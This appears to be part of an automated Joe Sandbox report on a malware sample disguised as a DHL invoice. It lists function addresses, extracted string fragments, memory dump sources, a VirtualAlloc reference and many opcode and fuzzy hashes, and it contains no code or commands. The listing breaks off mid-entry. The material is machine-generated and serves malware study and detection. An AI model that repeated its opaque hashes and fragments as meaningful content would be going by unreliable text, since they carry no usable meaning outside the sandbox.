Instruction ID: cc918f516257f1817ab8c406510cf44f448acb7e7ad355ea6b47c22451a008ab
Opcode Fuzzy Hash: e973a0a64358c242360caabeaf3e45907f752f45ecdb378b08fcd154dc53a674
Instruction Fuzzy Hash: A6912434B006188FCB14DF69C884A6A7BF6BF89700B1584A9E505DF3B5DB71ED41CBA1

Function 05C2C438 Relevance: 1.5, Strings: 1, Instructions: 224COMMON

Download Yara Rule

Strings

4'^q, xrefs: 05C2C662

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: e7fdb5a4fd1809f3ffcd085ff89529c4017ef2c44a52b2a067b5914d238dd171
Instruction ID: eb56d2fb5744d0b0964aaf31e0c43285f5678b07731e6eb90dd631b75e88257a
Opcode Fuzzy Hash: e7fdb5a4fd1809f3ffcd085ff89529c4017ef2c44a52b2a067b5914d238dd171
Instruction Fuzzy Hash: BEA1C834A10218DFCB14DFA4D898A9DBBB6BF88300F558559E406AB364DF30ED42CB91

Function 05C2E810 Relevance: 1.4, Strings: 1, Instructions: 152COMMON

Download Yara Rule

Strings

(bq, xrefs: 05C2E8DB

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: 9380809829a8f793792ca0d2a055658ee2d4a6807261af54c37654afe833c74a
Instruction ID: 2370f8efd495de468af253216e071475cdd49c0f7ec879826addee4fa15d8e97
Opcode Fuzzy Hash: 9380809829a8f793792ca0d2a055658ee2d4a6807261af54c37654afe833c74a
Instruction Fuzzy Hash: 2F41B2357041648FCB54DF39C854A7E3BEABF9971071584A9E44ADB3A1CE34DE029B90

Function 0624FC50 Relevance: 1.4, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0624FC8A

Memory Dump Source

Source File: 00000000.00000002.2050914473.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: ed991801d2ebe7aac9239e20494963009a1cac6528bcd08c8ab4c3d886e865f3
Instruction ID: ec2cbc5533bd922aba9ddc09f8075942937093a4c5652db0467e05a67268dff4
Opcode Fuzzy Hash: ed991801d2ebe7aac9239e20494963009a1cac6528bcd08c8ab4c3d886e865f3
Instruction Fuzzy Hash: D2415634B206249FCB14FB68C898A6E77BBBFC9700F504419D406AB394DF74AC46DB91

Function 053C1E8C Relevance: 1.4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

4'^q, xrefs: 053C2659

Memory Dump Source

Source File: 00000000.00000002.2049813348.00000000053C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53c0000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 1b5e9551c6fef7862af412fccf006029503109be2fa615c1814ec413458914fe
Instruction ID: 39cdc212c584d7ee8f0911343144ea11c7f271be68172de8affaeac551ba0efa
Opcode Fuzzy Hash: 1b5e9551c6fef7862af412fccf006029503109be2fa615c1814ec413458914fe
Instruction Fuzzy Hash: 67414938D08208CFCB25CFA9D4496BEBFB6BB46201F1081EEE096A3652C7745E85DF51

Function 05C22123 Relevance: 1.4, Strings: 1, Instructions: 120COMMON

Download Yara Rule

Strings

pbq, xrefs: 05C22170

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: pbq
API String ID: 0-3896149868
Opcode ID: a926e17d876ffbd4b293c3e67c0d34711c8e92f17d148e31d827d0cd5f8a52cb
Instruction ID: 0385a9aff4b752d87b38dc9c492755961424bd2c696eab3b26f63ea7098f9e1b
Opcode Fuzzy Hash: a926e17d876ffbd4b293c3e67c0d34711c8e92f17d148e31d827d0cd5f8a52cb
Instruction Fuzzy Hash: 0241D876640100AFCB4A9FA8C954D557BF7FF8C3147168494E2099B276DA32DC22EB50

Function 05C22128 Relevance: 1.4, Strings: 1, Instructions: 119COMMON

Download Yara Rule

Strings

pbq, xrefs: 05C22170

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: pbq
API String ID: 0-3896149868
Opcode ID: d05d1eecc2de15dd57b3317e1a79ff6a427ef38be41c553d636a90e2e2fcb138
Instruction ID: 1e476e400238142685f107fdcb31fd055e141106b834af9ea3570cd330bf3afa
Opcode Fuzzy Hash: d05d1eecc2de15dd57b3317e1a79ff6a427ef38be41c553d636a90e2e2fcb138
Instruction Fuzzy Hash: E041C776640100AFCB4A9FA8C954D597BF7FF8C3147168498E2099B276DA32DC22EB51

Function 05C23F60 Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

,bq, xrefs: 05C23FC3

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: ,bq
API String ID: 0-2474004448
Opcode ID: e0df1ab45d27cb61837b97cc1cfffc39175cfd8be52d15869ffe3f94edd96339
Instruction ID: caa48de620a6817daacd0fcfdd5339f827253f86a7cc65188fa27c13c80b9aaf
Opcode Fuzzy Hash: e0df1ab45d27cb61837b97cc1cfffc39175cfd8be52d15869ffe3f94edd96339
Instruction Fuzzy Hash: E641BC357001158FCB04DF69D8909AEBBF2FF89311B11846AE906DB361CB31ED41CB91

Function 0624A290 Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

%, xrefs: 0624AB5D

Memory Dump Source

Source File: 00000000.00000002.2050914473.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: %
API String ID: 0-2567322570
Opcode ID: a5cd1679c288fbd7dbe7628a7cc9063185a74b9204756fa9663c002eaacd6fd2
Instruction ID: 69ac3b04abe17bfec10d62eaa5924d3a1f3d3bb79f466ffb2d223c72ae395534
Opcode Fuzzy Hash: a5cd1679c288fbd7dbe7628a7cc9063185a74b9204756fa9663c002eaacd6fd2
Instruction Fuzzy Hash: 79511A70D54228CFEB68DF69C84879DBBB5BF48300F0085AAD80AA7354DB705AC5CF91

Function 05C2FAE0 Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

4'^q, xrefs: 05C2FB97

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 1eee8667f7e2f70ec2e79cd921793e2c2b7a400d5e6f8c87ce15adb4bf24016d
Instruction ID: db40f5620d4ed87dcc8a395259c796476af1d06bb32772d2e10cbcf7c76a19a2
Opcode Fuzzy Hash: 1eee8667f7e2f70ec2e79cd921793e2c2b7a400d5e6f8c87ce15adb4bf24016d
Instruction Fuzzy Hash: 5D416D353406149FD318DB28C969F2B7BEAABC8710F104968E10ACB3A5CE75EC42CB91

Function 05C2FAF0 Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

4'^q, xrefs: 05C2FB97

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 320c21e809d5f322631f7615760e3a3a6c210c05010ef9dee577c124c26b0622
Instruction ID: a057a7150b4e4466810d091dd0122bb06b3adb832fd6af78a09c29fc69408ce7
Opcode Fuzzy Hash: 320c21e809d5f322631f7615760e3a3a6c210c05010ef9dee577c124c26b0622
Instruction Fuzzy Hash: EE314C357406149FD318DB68C5A9F2A77EABBCC710F104968E50ACB3A5DE71EC42CB91

Function 05C2B4B8 Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

4'^q, xrefs: 05C2B501

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: befcc1fe6a889a07a6e813d5bbca5cb27d9f5eff68a89673c63db6b96eb6663d
Instruction ID: e1c7347e2227d8f9b442bd706bb9e72ac7f07aa95753251fe6baabdb22427796
Opcode Fuzzy Hash: befcc1fe6a889a07a6e813d5bbca5cb27d9f5eff68a89673c63db6b96eb6663d
Instruction Fuzzy Hash: 6D31D2367101089FCF148FA4C894E5ABBB7FF8C310B0544A9E90A9B365CA32EC12DB51

Function 05C26BD0 Relevance: 1.3, Strings: 1, Instructions: 76COMMON

Download Yara Rule

Strings

p<^q, xrefs: 05C26C1A

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: p<^q
API String ID: 0-1680888324
Opcode ID: 772925ec308e82bff791a43529d7ae9f0f4dd2855e06f475f931a079f0290b79
Instruction ID: 20ac1c185fb92f773dd4bb8f987d5835014cfd7d6bd5f3836107b0d21d49ac87
Opcode Fuzzy Hash: 772925ec308e82bff791a43529d7ae9f0f4dd2855e06f475f931a079f0290b79
Instruction Fuzzy Hash: 24215E713041549FCB15DF2AC854AAA7BF6FF8A210B054495F84ACB361DA35DD91CB30

Function 05C26BE0 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

p<^q, xrefs: 05C26C1A

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: p<^q
API String ID: 0-1680888324
Opcode ID: 8e7cde0520889b66232d80de0a5266450c6172c96b344c235ad1c7e82ff7a8e1
Instruction ID: c741822b1ed7afa2df805aacb9c4f2d11cfa31d3bd014b78ababdf08fd5ef9f4
Opcode Fuzzy Hash: 8e7cde0520889b66232d80de0a5266450c6172c96b344c235ad1c7e82ff7a8e1
Instruction Fuzzy Hash: 902149713041649FCB15DF2AC844AAA7BEAFF89210F0544A5FC4ACB361CA35DD91CB70

Function 00A508B1 Relevance: 1.3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

Strings

Te^q, xrefs: 00A50919

Memory Dump Source

Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 618c490894d70860b21acb3e02e413d65c08d00e4bf85f3e66b14ef7ee670b7a
Instruction ID: 270b8811b1721308bbf5e32f965b17e5d91f22fd591c3478b56d4a2bf02eb245
Opcode Fuzzy Hash: 618c490894d70860b21acb3e02e413d65c08d00e4bf85f3e66b14ef7ee670b7a
Instruction Fuzzy Hash: F8217C30A04204DFDB15AB78C465AADBAF2AFC9301F20852DD446AB395DF754846CB56

Function 05C23F52 Relevance: 1.3, Strings: 1, Instructions: 57COMMON

Download Yara Rule

Strings

,bq, xrefs: 05C23FC3

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: ,bq
API String ID: 0-2474004448
Opcode ID: 11a379aa76b9cc6a44c2f81d44a88156bf8b518a104f5ad6f2f7d6d90ddb027a
Instruction ID: 2e985fa5496a74c1fdf228adb6df38a4c3ecb71f74752fdea7004519e6615137
Opcode Fuzzy Hash: 11a379aa76b9cc6a44c2f81d44a88156bf8b518a104f5ad6f2f7d6d90ddb027a
Instruction Fuzzy Hash: 87119035B001558FCB05DF68C994A6EBBB2BF85301B1580A6E901DB3A5D731ED41CB91

Function 05391388 Relevance: 1.3, APIs: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 053913FB

Memory Dump Source

Source File: 00000000.00000002.2049761516.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5390000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 211efda711b57053c9d8eeb31f5d2a8f7b075f0157a0f4da797d7399d7ab9c50
Instruction ID: 300cc8eb63e13b4758004963f8fa9f2f166d0016621fec76707709872b47ef51
Opcode Fuzzy Hash: 211efda711b57053c9d8eeb31f5d2a8f7b075f0157a0f4da797d7399d7ab9c50
Instruction Fuzzy Hash: B61167B28002498FCB10DFAAC845BDFFBF5EF88324F248429E459A7210C775A544CF94

Function 05391390 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 053913FB

Memory Dump Source

Source File: 00000000.00000002.2049761516.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5390000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5649fe1c41705398a4bee3c6dba3f9efc318275594024714926792c97d8e0ea0
Instruction ID: 5afa636d7c31b4f25683dadf63bdf8ed0dcdcefc95124c4396336f699c3336f8
Opcode Fuzzy Hash: 5649fe1c41705398a4bee3c6dba3f9efc318275594024714926792c97d8e0ea0
Instruction Fuzzy Hash: 521134B19002498FDB14DFAAC844BEFFBF5EB88320F208429E459A7250C775A544CFA4

Function 00A508E5 Relevance: 1.3, Strings: 1, Instructions: 49COMMON

Download Yara Rule

Strings

Te^q, xrefs: 00A50919

Memory Dump Source

Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 80ddd6fc0894c25f6bb4a13d746890eccb18965d5b34e6cf85d08e76a04a7b5e
Instruction ID: 1600c76e45f23ab058ecf1856334eff095386d89689cca2fbdfbaec1ea8f378e
Opcode Fuzzy Hash: 80ddd6fc0894c25f6bb4a13d746890eccb18965d5b34e6cf85d08e76a04a7b5e
Instruction Fuzzy Hash: 5D111530B00214CFDB45AB78C559BADB6F2BFC9701F248829D806AB3A5CF758945CB96

Function 00A509FB Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

tocq, xrefs: 00A50A0A

Memory Dump Source

Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: tocq
API String ID: 0-4013956356
Opcode ID: c70bfbcfd1546bb1caf39749eaf8d6c9023fb76d14c4c5edbc8c68a4e16d467c
Instruction ID: 45ec444678186fad27d73273d1a5251ec158b335d3b92a69a342ae541bf45dcd
Opcode Fuzzy Hash: c70bfbcfd1546bb1caf39749eaf8d6c9023fb76d14c4c5edbc8c68a4e16d467c
Instruction Fuzzy Hash: 0D11E270B50219DFCB54DB68E998F6E7BF2BB88701F144469E506EB3A0CB749C44DB50

Function 00A560F2 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

w, xrefs: 00A56147

Memory Dump Source

Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: w
API String ID: 0-476252946
Opcode ID: 5c464f83cf5f28dbe997d9300beb46cca6bb37afcad1ddd6cefba9a86817c812
Instruction ID: e2663fdc9b1735719a88de11f7b1a830920a928502c5703416080845fc0d0380
Opcode Fuzzy Hash: 5c464f83cf5f28dbe997d9300beb46cca6bb37afcad1ddd6cefba9a86817c812
Instruction Fuzzy Hash: F6F03F74E05228CFEFA0CF50C8487DABBB0BB5A302F0044E6D849A2241C7741EC8CF86

Function 00A56D4D Relevance: 1.3, Strings: 1, Instructions: 18COMMON

Download Yara Rule

Strings

M, xrefs: 00A5D694

Memory Dump Source

Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: baae26bc854fd205ef0c8a10107514b9e1ebed73dc8cff5ad74ee679defe657e
Instruction ID: e4f0da0b1ab6cba75ebfa66789be85e9348bcfa1f3eba773fc45b4319be0cd4f
Opcode Fuzzy Hash: baae26bc854fd205ef0c8a10107514b9e1ebed73dc8cff5ad74ee679defe657e
Instruction Fuzzy Hash: 0BE0E5749052688FDB20CB24CC45BE9B7B1BB1A350F1046DAAA1DBB7C0D3B59E81CF44

Function 05C1A4F5 Relevance: 1.3, Strings: 1, Instructions: 13COMMON

Download Yara Rule

Strings

8, xrefs: 05C1DB05

Memory Dump Source

Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: 8
API String ID: 0-4194326291
Opcode ID: 8e79023166b69cc30324d6eb1bb4a60d08941f8d8f202753d7f550d2d34c38c6
Instruction ID: 08cce52a1ff1560dd57d4cd2a11dba3aa1699a42b6cc928ff89047d7ad30801f
Opcode Fuzzy Hash: 8e79023166b69cc30324d6eb1bb4a60d08941f8d8f202753d7f550d2d34c38c6
Instruction Fuzzy Hash: AED02E74A4930E8FDB04EF20C9886AA7BBBBB81300F004864C8065B304CA3808488F00

Function 05C1A376 Relevance: 1.3, Strings: 1, Instructions: 13COMMON

Download Yara Rule

Strings

8, xrefs: 05C1DB05

Memory Dump Source

Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: 8
API String ID: 0-4194326291
Opcode ID: 4f93fae0825ebabe7ef5eecbc2f0ed15a4d91fda5e81f39dd7e90b548771077c
Instruction ID: 08cce52a1ff1560dd57d4cd2a11dba3aa1699a42b6cc928ff89047d7ad30801f
Opcode Fuzzy Hash: 4f93fae0825ebabe7ef5eecbc2f0ed15a4d91fda5e81f39dd7e90b548771077c
Instruction Fuzzy Hash: AED02E74A4930E8FDB04EF20C9886AA7BBBBB81300F004864C8065B304CA3808488F00

Function 05C13276 Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b6be202944be94c1285a3e4c0e9997cba75b15ab91e192e4bc685cb51e8ff67
Instruction ID: e1bfa87ee950b7067dbbb592ee53133f77cd2da32a2fc3d6ffd8bd22a1460a8c
Opcode Fuzzy Hash: 0b6be202944be94c1285a3e4c0e9997cba75b15ab91e192e4bc685cb51e8ff67
Instruction Fuzzy Hash: 6CB15D70D08288CFCB14DFA9D5446ADBBF6FF4A705F208829E819AB355CB305A45DF54

Function 05C237F8 Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b62fd072381b6be7bc897d9e4f8d0397196b76e64736dd5265329a416fdb938e
Instruction ID: ea386fa12304de25a92304f97ba405c70242f1352ef1671bc7cc9e76c59062ba
Opcode Fuzzy Hash: b62fd072381b6be7bc897d9e4f8d0397196b76e64736dd5265329a416fdb938e
Instruction Fuzzy Hash: 2D917C35B012549FDB14DFA9D985AADBBB2FF88711F108869E902AB390CB35DE41CF50

Function 05C26D03 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e97c0c20ea0dd6c76c4d9d4dbb6d70329e29602b65a4759bb2f7ff7a6cc96de3
Instruction ID: 97352cb2bb01b27b2b0f9d5b03262a6075c612fb7dbc85700fb09be2deeb874e
Opcode Fuzzy Hash: e97c0c20ea0dd6c76c4d9d4dbb6d70329e29602b65a4759bb2f7ff7a6cc96de3
Instruction Fuzzy Hash: 35A15035E006398FDF11DFA5D894AEEBBB6FF48700F148815E811A7255DB389A46CF60

Function 05C28D50 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 183b6161ffc6d4f0888dc095627d9c1d7e8f003e3fd72de6bbc137a4b94fc372
Instruction ID: 0acec95a14b7e395d2301ee8ecddf399151fbe84930c0e57f7ad4c08f589f44a
Opcode Fuzzy Hash: 183b6161ffc6d4f0888dc095627d9c1d7e8f003e3fd72de6bbc137a4b94fc372
Instruction Fuzzy Hash: F681E939A00628CFCB14DF69C58499EB7F6FF88710B1585A9E816DB361DB34ED42CB90

Function 05C1772F Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b013fe0dd482ae720ec6b6492df311ee88477b6cadd64d1c0e75561aae05540c
Instruction ID: 80a601f789d0e1846560a27e895e416d908f7d93ab2210a1d3c2d4dca8d53a26
Opcode Fuzzy Hash: b013fe0dd482ae720ec6b6492df311ee88477b6cadd64d1c0e75561aae05540c
Instruction Fuzzy Hash: DD714A74D05209CFDB05CFA9D584AADBBF2FF4A304F2084A9D825A7250D7309A85DF89

Function 05C23AB0 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 133a8dbc70730d3ccced23de1746a2a5928c8c3b2c2162bb31365ccfd338570e
Instruction ID: e49fb139ea8984f7e2d306c6890c67a38bbb508d433e43356f01a9593a23f3dd
Opcode Fuzzy Hash: 133a8dbc70730d3ccced23de1746a2a5928c8c3b2c2162bb31365ccfd338570e
Instruction Fuzzy Hash: B951C035B04255DFCB11CB69D885B6ABBB6FB88710F148C7AE915DB381CB35E802CB90

Function 05C17798 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4493e59769abe63a4b698b858432651edf389c98a8c4657275c9cdffc73e93d7
Instruction ID: 67f455e3c680bcc1dfbf5bb4df4d39ed2dad1b94960e8fbf78ea282b7a07beac
Opcode Fuzzy Hash: 4493e59769abe63a4b698b858432651edf389c98a8c4657275c9cdffc73e93d7
Instruction Fuzzy Hash: 6B611674E05209CFDB04CFA9D984AEDBBF2FF49304F108469D825AB250DB74AA85CF95

Function 05C2C018 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29b4c6d3d05ad89cbe7fdbe5497cac993619b081a1c6a0fe5cc46c489826a6f2
Instruction ID: fcc3f448212e14f0e71411f68479f7953813132b70be50a5947ecff3a6e4a24f
Opcode Fuzzy Hash: 29b4c6d3d05ad89cbe7fdbe5497cac993619b081a1c6a0fe5cc46c489826a6f2
Instruction Fuzzy Hash: 54515E34B106199FCB149F64E459AAE7BBAFFC8715F004519F506973A4DF30A906CF82

Function 05C1EB18 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3168615dffb919d73e92088954e8a7a39b4ff44a91712732a13ec033526a47c
Instruction ID: 5175e749bfce9d8b94166d9b7a6bd016609815182020079a9d72a812df0a11af
Opcode Fuzzy Hash: b3168615dffb919d73e92088954e8a7a39b4ff44a91712732a13ec033526a47c
Instruction Fuzzy Hash: 3A511974904218CFDB64DF19C889BA9BBB6BF8A300F1084E5E80DE7351DB745A84DF58

Function 05C179F8 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ee31e4162b703e2f8dc55541a0deffed88b2660b956220106eb2c80cea43f8b
Instruction ID: fbf3198a7fe67c261b2181a96614aa746cafac2b65fd9c557097bc21b3f26559
Opcode Fuzzy Hash: 9ee31e4162b703e2f8dc55541a0deffed88b2660b956220106eb2c80cea43f8b
